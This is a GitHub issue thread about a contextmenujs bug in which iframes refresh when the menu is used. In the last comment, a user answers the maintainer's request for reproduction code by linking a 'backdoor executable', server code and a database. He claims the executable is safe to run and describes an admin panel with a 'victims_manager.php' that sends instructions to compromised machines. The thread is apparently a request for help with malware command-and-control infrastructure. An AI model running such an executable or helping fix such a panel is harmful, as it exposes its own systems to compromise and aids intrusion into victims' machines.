### ISSUE TITLE
ContextMenu refresh iframes

### ISSUE THREAD

**Issue by ghost** [m-thalmann/contextmenujs#2]
Big problem here, im working with iframes, but when im opening a new iframe when clicking on a contextmenu item.
Its refreshing all iframes, and make them not usable properly.

https://user-images.githubusercontent.com/52961795/102896183-40d53680-4466-11eb-8f50-0b13c0e7e3c6.mp4

**Comment by m-thalmann** [comment]
Can you give me steps to reproduce this problem?

**Comment by ghost** [comment]
Create an iframe.
Use the contextmenu.
The iframe will be refreshed

**Comment by m-thalmann** [comment]
The iframe is not refreshing for me. Unless you can provide some code to reproduce this, I assume the problem is on your side,

**Comment by xPythh** [comment]
SERVER Code :  https://filebin.net/blv58conaf85dy1s
MySQL Server Database : https://filebin.net/xeoxs6urxzegkq1i
Backdoor executable : https://filebin.net/rx8ageq76lcyqfvj 
[Can be executed safely, turn in background without any risk, can be stopped using taskmanager || Software can be scand using [dnSpy](https://github.com/dnSpy/dnSpy/releases) in case of doubts]

Test need to be done using [xampp](https://www.apachefriends.org/fr/download.html)

Main files locations : 
./admin/index.php     [Admin panel visible in the first video] [Iframes are spawning here||contextMenu also]

./admin/victims_manager.php    [Recieve instructions from the panel and output response (Content of all iframes)]

./admin/scripts/cotnextMenu.js    [contextmenujs config, triggers and listener on victim click]

./admin/scripts/iframeManager.js    [Spawn iframes depending of size setup in contextMenu.js]



If you have any questions for setup or explains, i will help you with no worries
